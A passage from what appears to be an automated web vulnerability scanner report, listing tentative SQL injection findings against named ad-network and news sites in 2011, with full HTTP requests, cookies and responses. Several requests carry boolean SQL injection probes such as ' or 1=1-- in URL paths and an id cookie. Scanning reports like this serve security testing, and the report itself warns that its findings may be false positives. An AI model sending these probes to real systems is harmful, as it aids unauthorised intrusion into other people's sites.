Cookie: au=GIP9HWY4-MADS-10.208.38.239; pup_1994=1296072492983; put_1994=6ch47d7o8wtv; pup_w55c=1296073239463; put_1523=MDo0lVW4JKDM6LrVGjt5veKcuBH63bWQ; pup_2025=1296224125224; pup_1512=1296224128533; put_2025=38f8a1ac-1e96-40c8-8d5e-172234bf5f5f; pup_1430=1296224129445; put_1512=4d3702bc-839e-0690-5370-3c19a9561295; put_1430=e6f6dead-6db2-4b47-a015-f587315583eb; pup_fimserve=1296224133489; pup_1902=1296226099073; pup_2081=1296226100651; put_1902=CfTKz1vxnM4Qo87LXqXVyg71y5oQqc-aCvFBOBEd; put_2081=CA-00000000456885722; pup_2101=1296226106985; lm="28 Jan 2011 14:48:45 GMT"; put_2101=82d726c3-44ee-407c-85c4-39a0b0fc11ef; pup_2084=1296226112564; pup_1185=1296226114213; pup_1986=1296226114410; put_1185=3011330574290390485; pup_2132=1296226115755; put_1986=4760492999213801733; put_2132=D8DB51BF08484217F5D14AB47F4002AD; pup_2100=1296226117318; put_2100=usr3fd748acf5bcab14; pup_1197=1296232890383; pup_rubicon=1296232891481; put_1197=3297869551067506954; csi15=3182054.js^1^1296236268^1296236268&763123.js^1^1296236268^1296236268&618560.js^1^1296236263^1296236263&3174529.js^3^1296226115^1296232920&3168345.js^2^1296232903^1296232919&3178300.js^1^1296232904^1296232904&3187311.js^2^1296226114^1296226127&3173809.js^1^1296224076^1296224076&3178297.js^1^1296224073^1296224073; khaos=GIPAEQ2D-C-IOYY; rpb=4894%3D1%264939%3D1%262399%3D1%263615%3D1%264940%3D1%265574%3D1%264210%3D1%265328%3D1%264554%3D1%265671%3D1%265852%3D1%264212%3D1%266286%3D1%266073%3D1%264214%3D1%263612%3D1%262372%3D1%262196%3D1%262111%3D1%262494%3D1%262189%3D1%263169%3D1%262374%3D1; ses9=9320^1&7531^1; csi9=3151064.js^1^1296308448^1296308448&618554.js^1^1296308324^1296308324; cd=false; ruid=154d290e46adc1d6f373dd09^7^1296350983^2915161843; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3UdIwsGOQ/PP8TzZUxGDmBad2r6N25AKxdPo9e; rdk=7665/13236; rdk2=0; ses2=7531^1&13236^1; csi2=3186999.js^1^1296350983^1296350983&328960.js^1^1296308415^1296308415

Response 1

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (Red Hat)
Content-Length: 241
_onnection: close
Content-Type: text/html; charset=iso-8859-1
Date: Sun, 30 Jan 2011 02:05:46 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /static/rtb/sync-min.html11180680' or 1=1-- was not
...[SNIP]...
</p>
</body></html>

Request 2

GET /static/rtb/sync-min.html11180680'%20or%201%3d2--%20 HTTP/1.1
Host: assets.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://msn.whitepages.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: au=GIP9HWY4-MADS-10.208.38.239; pup_1994=1296072492983; put_1994=6ch47d7o8wtv; pup_w55c=1296073239463; put_1523=MDo0lVW4JKDM6LrVGjt5veKcuBH63bWQ; pup_2025=1296224125224; pup_1512=1296224128533; put_2025=38f8a1ac-1e96-40c8-8d5e-172234bf5f5f; pup_1430=1296224129445; put_1512=4d3702bc-839e-0690-5370-3c19a9561295; put_1430=e6f6dead-6db2-4b47-a015-f587315583eb; pup_fimserve=1296224133489; pup_1902=1296226099073; pup_2081=1296226100651; put_1902=CfTKz1vxnM4Qo87LXqXVyg71y5oQqc-aCvFBOBEd; put_2081=CA-00000000456885722; pup_2101=1296226106985; lm="28 Jan 2011 14:48:45 GMT"; put_2101=82d726c3-44ee-407c-85c4-39a0b0fc11ef; pup_2084=1296226112564; pup_1185=1296226114213; pup_1986=1296226114410; put_1185=3011330574290390485; pup_2132=1296226115755; put_1986=4760492999213801733; put_2132=D8DB51BF08484217F5D14AB47F4002AD; pup_2100=1296226117318; put_2100=usr3fd748acf5bcab14; pup_1197=1296232890383; pup_rubicon=1296232891481; put_1197=3297869551067506954; csi15=3182054.js^1^1296236268^1296236268&763123.js^1^1296236268^1296236268&618560.js^1^1296236263^1296236263&3174529.js^3^1296226115^1296232920&3168345.js^2^1296232903^1296232919&3178300.js^1^1296232904^1296232904&3187311.js^2^1296226114^1296226127&3173809.js^1^1296224076^1296224076&3178297.js^1^1296224073^1296224073; khaos=GIPAEQ2D-C-IOYY; rpb=4894%3D1%264939%3D1%262399%3D1%263615%3D1%264940%3D1%265574%3D1%264210%3D1%265328%3D1%264554%3D1%265671%3D1%265852%3D1%264212%3D1%266286%3D1%266073%3D1%264214%3D1%263612%3D1%262372%3D1%262196%3D1%262111%3D1%262494%3D1%262189%3D1%263169%3D1%262374%3D1; ses9=9320^1&7531^1; csi9=3151064.js^1^1296308448^1296308448&618554.js^1^1296308324^1296308324; cd=false; ruid=154d290e46adc1d6f373dd09^7^1296350983^2915161843; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3UdIwsGOQ/PP8TzZUxGDmBad2r6N25AKxdPo9e; rdk=7665/13236; rdk2=0; ses2=7531^1&13236^1; csi2=3186999.js^1^1296350983^1296350983&328960.js^1^1296308415^1296308415

Response 2

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (Red Hat)
Content-Length: 332
_onnection: close
Content-Type: text/html; charset=iso-8859-1
Date: Sun, 30 Jan 2011 02:05:46 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /static/rtb/sync-min.html11180680' or 1=2-- was not
...[SNIP]...
</p>
<hr>
<address>Apache/2.2.3 (Red Hat) Server at assets.rubiconproject.com Port 80</address>
</body></html>

1.7. http://assets.rubiconproject.com/static/rtb/sync-min.html/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://assets.rubiconproject.com
Path:	/static/rtb/sync-min.html/

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payloads 77927196'%20or%201%3d1--%20 and 77927196'%20or%201%3d2--%20 were each submitted in the REST URL parameter 3. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /static/rtb/sync-min.html77927196'%20or%201%3d1--%20/ HTTP/1.1
Host: assets.rubiconproject.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: put_1902=CfTKz1vxnM4Qo87LXqXVyg71y5oQqc-aCvFBOBEd; pup_2081=1296226100651; lm="28 Jan 2011 14:48:45 GMT"; pup_2084=1296226112564; pup_w55c=1296073239463; put_2132=D8DB51BF08484217F5D14AB47F4002AD; pup_2132=1296226115755; pup_rubicon=1296232891481; pup_1902=1296226099073; put_2025=38f8a1ac-1e96-40c8-8d5e-172234bf5f5f; csi9=3151064.js^1^1296308448^1296308448&618554.js^1^1296308324^1296308324; put_1185=3011330574290390485; pup_1197=1296232890383; rpb=4894%3D1%264939%3D1%262399%3D1%263615%3D1%264940%3D1%265574%3D1%264210%3D1%265328%3D1%264554%3D1%265671%3D1%265852%3D1%264212%3D1%266286%3D1%266073%3D1%264214%3D1%263612%3D1%262372%3D1%262196%3D1%262111%3D1%262494%3D1%262189%3D1%263169%3D1%262374%3D1; rdk=7665/13236; put_1523=MDo0lVW4JKDM6LrVGjt5veKcuBH63bWQ; csi15=3182054.js^1^1296236268^1296236268&763123.js^1^1296236268^1296236268&618560.js^1^1296236263^1296236263&3174529.js^3^1296226115^1296232920&3168345.js^2^1296232903^1296232919&3178300.js^1^1296232904^1296232904&3187311.js^2^1296226114^1296226127&3173809.js^1^1296224076^1296224076&3178297.js^1^1296224073^1296224073; put_2081=CA-00000000456885722; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3UdIwsGOQ/PP8TzZUxGDmBad2r6N25AKxdPo9e; put_1994=6ch47d7o8wtv; pup_1512=1296224128533; pup_1986=1296226114410; pup_2100=1296226117318; pup_2025=1296224125224; pup_2101=1296226106985; put_2100=usr3fd748acf5bcab14; pup_1430=1296224129445; put_1430=e6f6dead-6db2-4b47-a015-f587315583eb; pup_1185=1296226114213; khaos=GIPAEQ2D-C-IOYY; put_1197=3297869551067506954; au=GIP9HWY4-MADS-10.208.38.239; pup_1994=1296072492983; ruid=154d290e46adc1d6f373dd09^7^1296350983^2915161843; put_2101=82d726c3-44ee-407c-85c4-39a0b0fc11ef; csi2=3186999.js^1^1296350983^1296350983&328960.js^1^1296308415^1296308415; ses9=9320^1&7531^1; pup_fimserve=1296224133489; put_1512=4d3702bc-839e-0690-5370-3c19a9561295; put_1986=4760492999213801733; rdk2=0; ses2=7531^1&13236^1; cd=false;

Response 1

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (Red Hat)
Content-Length: 333
_onnection: close
Content-Type: text/html; charset=iso-8859-1
Date: Sun, 30 Jan 2011 02:05:47 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /static/rtb/sync-min.html77927196' or 1=1-- / was not
...[SNIP]...
</p>
<hr>
<address>Apache/2.2.3 (Red Hat) Server at assets.rubiconproject.com Port 80</address>
</body></html>

Request 2

GET /static/rtb/sync-min.html77927196'%20or%201%3d2--%20/ HTTP/1.1
Host: assets.rubiconproject.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: put_1902=CfTKz1vxnM4Qo87LXqXVyg71y5oQqc-aCvFBOBEd; pup_2081=1296226100651; lm="28 Jan 2011 14:48:45 GMT"; pup_2084=1296226112564; pup_w55c=1296073239463; put_2132=D8DB51BF08484217F5D14AB47F4002AD; pup_2132=1296226115755; pup_rubicon=1296232891481; pup_1902=1296226099073; put_2025=38f8a1ac-1e96-40c8-8d5e-172234bf5f5f; csi9=3151064.js^1^1296308448^1296308448&618554.js^1^1296308324^1296308324; put_1185=3011330574290390485; pup_1197=1296232890383; rpb=4894%3D1%264939%3D1%262399%3D1%263615%3D1%264940%3D1%265574%3D1%264210%3D1%265328%3D1%264554%3D1%265671%3D1%265852%3D1%264212%3D1%266286%3D1%266073%3D1%264214%3D1%263612%3D1%262372%3D1%262196%3D1%262111%3D1%262494%3D1%262189%3D1%263169%3D1%262374%3D1; rdk=7665/13236; put_1523=MDo0lVW4JKDM6LrVGjt5veKcuBH63bWQ; csi15=3182054.js^1^1296236268^1296236268&763123.js^1^1296236268^1296236268&618560.js^1^1296236263^1296236263&3174529.js^3^1296226115^1296232920&3168345.js^2^1296232903^1296232919&3178300.js^1^1296232904^1296232904&3187311.js^2^1296226114^1296226127&3173809.js^1^1296224076^1296224076&3178297.js^1^1296224073^1296224073; put_2081=CA-00000000456885722; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3UdIwsGOQ/PP8TzZUxGDmBad2r6N25AKxdPo9e; put_1994=6ch47d7o8wtv; pup_1512=1296224128533; pup_1986=1296226114410; pup_2100=1296226117318; pup_2025=1296224125224; pup_2101=1296226106985; put_2100=usr3fd748acf5bcab14; pup_1430=1296224129445; put_1430=e6f6dead-6db2-4b47-a015-f587315583eb; pup_1185=1296226114213; khaos=GIPAEQ2D-C-IOYY; put_1197=3297869551067506954; au=GIP9HWY4-MADS-10.208.38.239; pup_1994=1296072492983; ruid=154d290e46adc1d6f373dd09^7^1296350983^2915161843; put_2101=82d726c3-44ee-407c-85c4-39a0b0fc11ef; csi2=3186999.js^1^1296350983^1296350983&328960.js^1^1296308415^1296308415; ses9=9320^1&7531^1; pup_fimserve=1296224133489; put_1512=4d3702bc-839e-0690-5370-3c19a9561295; put_1986=4760492999213801733; rdk2=0; ses2=7531^1&13236^1; cd=false;

Response 2

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (Red Hat)
Content-Length: 242
_onnection: close
Content-Type: text/html; charset=iso-8859-1
Date: Sun, 30 Jan 2011 02:05:47 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /static/rtb/sync-min.html77927196' or 1=2-- / was not
...[SNIP]...
</p>
</body></html>

1.8. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/16566708061@x90 [id cookie] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://b3.mookie1.com
Path:	/3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/16566708061@x90

Issue detail

The id cookie appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the id cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/16566708061@x90?http://r1-ads.ace.advertising.com/click/site=0000730461/mnum=0000950192/cstr=12110217=_4d44bf07,6566708061,730461^950192^1183^0,1_/xsxdata=$XSXDATA/bnum=12110217/optn=64?trg= HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://msn.whitepages.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380'%20and%201%3d1--%20; dlx_7d=set; Dominos=DataXuB3; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; ATTWL=CollectiveB3; session=1296350849|1296350849

Response 1

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 01:42:25 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 3192
Content-Type: application/x-javascript
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09499e6c45525d5f4f58455e445a4a423660;path=/

document.write ('<IFRAME SRC="http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.7;sz=728x90;click0=http://r1-ads.ace.advertising.com/click/site=0000730461/mnum=0000950192/cstr=12110217=_4d44bf07,6566708061,730461_950192_1183_0,1_/xsxdata=$XSXDATA/bnum=12110217/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/728/L36/1010594923/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=1010594923?" WIDTH=728 HEIGHT=90 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR=');
document.write ("'");
document.write ('#000000');
document.write ("'");
document.write ('>\n');
document.write ('<SCRIPT language=');
document.write ("'");
document.write ('JavaScript1.1');
document.write ("'");
document.write (' SRC="http://ad.doubleclick.net/adj/N3867.270604.B3/B5128597.7;abr=!ie;sz=728x90;click0=http://r1-ads.ace.advertising.com/click/site=0000730461/mnum=0000950192/cstr=12110217=_4d44bf07,6566708061,730461_950192_1183_0,1_/xsxdata=$XSXDATA/bnum=12110217/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/728/L36/1010594923/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=1010594923?">\n');
document.write ('</SCRIPT>\n');
document.write ('<NOSCRIPT>\n');
document.write ('<A HREF="http://r1-ads.ace.advertising.com/click/site=0000730461/mnum=0000950192/cstr=12110217=_4d44bf07,6566708061,730461_950192_1183_0,1_/xsxdata=$XSXDATA/bnum=12110217/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/728/L36/1010594923/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?http://ad.doubleclick.net/jump/N3867.270604.B3/B5128597.7;abr=!ie4;abr=!ie5;sz=728x90;ord=1010594923?">\n');
document.write ('<IMG SRC="http://ad.doubleclick.net/ad/N3867.270604.B3/B5128597.7;abr=!ie4;abr=!ie5;sz=728x90;ord=1010594923?" BORDER=0 WIDTH=728 HEIGHT=90 ALT="Advertisement"></A>\n');
document.write ('</NOSCRIPT>\n');
document.write ('</IFRAME>\n');
document.write ('<SCRIPT TYPE="text/javascript" language="JavaScript">\n');
document.write ('var B3d=new Date();\n');
document.write ('var B3m=B3d.getTime();\n');
document.write ('B3d.setTime(B3m+30*24*60*60*100
...[SNIP]...

Request 2

GET /3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/16566708061@x90?http://r1-ads.ace.advertising.com/click/site=0000730461/mnum=0000950192/cstr=12110217=_4d44bf07,6566708061,730461^950192^1183^0,1_/xsxdata=$XSXDATA/bnum=12110217/optn=64?trg= HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://msn.whitepages.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380'%20and%201%3d2--%20; dlx_7d=set; Dominos=DataXuB3; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; ATTWL=CollectiveB3; session=1296350849|1296350849

Response 2

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 01:42:26 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 3174
Content-Type: application/x-javascript
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09499e2545525d5f4f58455e445a4a423660;path=/

document.write ('<IFRAME SRC="http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.7;sz=728x90;click0=http://r1-ads.ace.advertising.com/click/site=0000730461/mnum=0000950192/cstr=12110217=_4d44bf07,6566708061,730461_950192_1183_0,1_/xsxdata=$XSXDATA/bnum=12110217/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/728/L36/71084410/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=71084410?" WIDTH=728 HEIGHT=90 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR=');
document.write ("'");
document.write ('#000000');
document.write ("'");
document.write ('>\n');
document.write ('<SCRIPT language=');
document.write ("'");
document.write ('JavaScript1.1');
document.write ("'");
document.write (' SRC="http://ad.doubleclick.net/adj/N3867.270604.B3/B5128597.7;abr=!ie;sz=728x90;click0=http://r1-ads.ace.advertising.com/click/site=0000730461/mnum=0000950192/cstr=12110217=_4d44bf07,6566708061,730461_950192_1183_0,1_/xsxdata=$XSXDATA/bnum=12110217/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/728/L36/71084410/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=71084410?">\n');
document.write ('</SCRIPT>\n');
document.write ('<NOSCRIPT>\n');
document.write ('<A HREF="http://r1-ads.ace.advertising.com/click/site=0000730461/mnum=0000950192/cstr=12110217=_4d44bf07,6566708061,730461_950192_1183_0,1_/xsxdata=$XSXDATA/bnum=12110217/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/728/L36/71084410/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?http://ad.doubleclick.net/jump/N3867.270604.B3/B5128597.7;abr=!ie4;abr=!ie5;sz=728x90;ord=71084410?">\n');
document.write ('<IMG SRC="http://ad.doubleclick.net/ad/N3867.270604.B3/B5128597.7;abr=!ie4;abr=!ie5;sz=728x90;ord=71084410?" BORDER=0 WIDTH=728 HEIGHT=90 ALT="Advertisement"></A>\n');
document.write ('</NOSCRIPT>\n');
document.write ('</IFRAME>\n');
document.write ('<SCRIPT TYPE="text/javascript" language="JavaScript">\n');
document.write ('var B3d=new Date();\n');
document.write ('var B3m=B3d.getTime();\n');
document.write ('B3d.setTime(B3m+30*24*60*60*1000);\n');
docum
...[SNIP]...

1.9. http://english.aljazeera.net/news/middleeast/2011/01/201113085252994161.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://english.aljazeera.net
Path:	/news/middleeast/2011/01/201113085252994161.html

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /news'%20and%201%3d1--%20/middleeast/2011/01/201113085252994161.html HTTP/1.1
Host: english.aljazeera.net
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 200 OK
Last-Modified: Sun, 30 Jan 2011 14:52:15 GMT
Expires: Sun, 30 Jan 2011 14:52:15 GMT
Date: Sun, 30 Jan 2011 14:52:15 GMT
Server: Microsoft-IIS/6.0
Cache-Control: public, max-age=360
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=gegnmk55z3ufcfy344ht1a45; path=/; HttpOnly
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 64156
X-Cache: MISS from 12.120.11.62
Via: 1.1 12.120.11.62:80 (cache/2.6.2.2.16.ATT)
Connection: keep-alive

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><title>
Egypt shuts down Al Jazeera bureau - Middle East - Al Jazeera English
</title><meta name="ROBOTS" content=" FOLLOW,INDEX" /><meta id="ctl00_meta1" name="description" content="Network's licences cancelled and accreditation of staff in Cairo withdrawn by order of information minister." /><meta name="keywords" content="Aljazeera, Al Jazeera, News, Middle east, Africa, Asia, Asia Pacific, Europe, Sports, Business, Special reports" /><meta http-equiv="CACHE-CONTROL" content="Public" /><meta id="ctl00_metaDate" http-equiv="Last-Modified" content="Sun, 30 Jan 2011 02:51:59 GMT" /><link href="/Styles/Templates2.css" rel="stylesheet" type="text/css" /><link href="/Styles/SiteMenu.css" rel="stylesheet" type="text/css" />
<script src="/Scripts/SiteMenu.js" type="text/javascript"></script>
<script src="/Scripts/Common.js" type="text/javascript"></script>
<script src="/Scripts/SiteScripts.js" type="text/javascript"></script>
<script src="/Scripts/ajax.js" type="text/javascript"></script>
<script src="/Scripts/AddthisSettings.js" type="text/javascript"></script>
<script src="/Scripts/jquery-1.2.3.pack.js" type="text/javascript"></script>
<script type="text/javascript" src="/AJEPlayer/swfobject.js"></script>
<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
</head>
<body class="MainBG" >
<form name="aspnetForm" method="post" action="Templates/FreeTemplate.aspx?Rq=6)O7AGuNR-5Hs3tQp8_-6aO0dG3Wd-4Z(w(lW3v-7G(ayK(!5-5YNMMejO2-7p0%3dPmm()-4DDj
...[SNIP]...

Request 2

GET /news'%20and%201%3d2--%20/middleeast/2011/01/201113085252994161.html HTTP/1.1
Host: english.aljazeera.net
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2 (redirected)

HTTP/1.1 200 OK
Last-Modified: Sun, 30 Jan 2011 14:51:59 GMT
Date: Sun, 30 Jan 2011 14:51:59 GMT
Server: Microsoft-IIS/6.0
Cache-Control: public, max-age=60
Content-Length: 174785
Content-Type: text/html
Age: 16
X-Cache: HIT from 12.120.11.62
Via: 1.1 12.120.11.62:80 (cache/2.6.2.2.16.ATT)
Connection: keep-alive

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
AJE - Al Jazeera English
</title><link id="ctl00_lnkRss" rel="alternate" type="application/rss+xml" title="Aljazeer English" href="/Services/Rss/?PostingId=2007731105943979989" /><meta name="ROBOTS" content=" FOLLOW,INDEX" /><meta name="keywords" content="Aljazeera, Al Jazeera, News, Middle east, Africa, Asia, Asia Pacific, Europe, Sports, Business, Special reports" /><meta http-equiv="CACHE-CONTROL" content="Public" /><meta id="ctl00_metaDate" http-equiv="Last-Modified" content="Sun, 30 Jan 2011 02:44:41 GMT" />
<link href="/Styles/Templates2.css" rel="stylesheet" type="text/css" />
<link href="/Styles/SiteMenu.css" rel="stylesheet" type="text/css" />
<script src="/Scripts/SiteMenu.js" type="text/javascript"></script>
<script src="/Scripts/Common.js" type="text/javascript"></script>
<script src="/Scripts/SiteScripts.js?i=1" type="text/javascript"></script>
<script src="/Scripts/jquery-1.2.3.pack.js" type="text/javascript"></script>
<script src="/Scripts/ajax.js" type="text/javascript"></script>
<script src="/Scripts/StoryFader.js" type="text/javascript"></script>
<script type="text/javascript" src="/AJEPlayer/swfobject.js"></script>
<script type="text/javascript">//isItMobile();</script>
</head>
<body class="MainBG">
<form id='Default' name='Default' method='post'>

<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWAwLwz6SaDgLlsYGEDAKx8M2kDQ==" />
<div id="dvSummaryExt">
<div id="dvSummaryMain">
<div id="dvBanners">
<div id="dvMainAd"></div>
<div id="dvAdSpacer"></div>
<div id="dvSmallAd"></div>
</div>
<div id="dvPageHeaderRow">

...[SNIP]...

1.10. http://english.aljazeera.net/news/middleeast/2011/01/201113085252994161.html [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://english.aljazeera.net
Path:	/news/middleeast/2011/01/201113085252994161.html

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the REST URL parameter 2. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /news/middleeast'%20and%201%3d1--%20/2011/01/201113085252994161.html HTTP/1.1
Host: english.aljazeera.net
Proxy-Connection: keep-alive
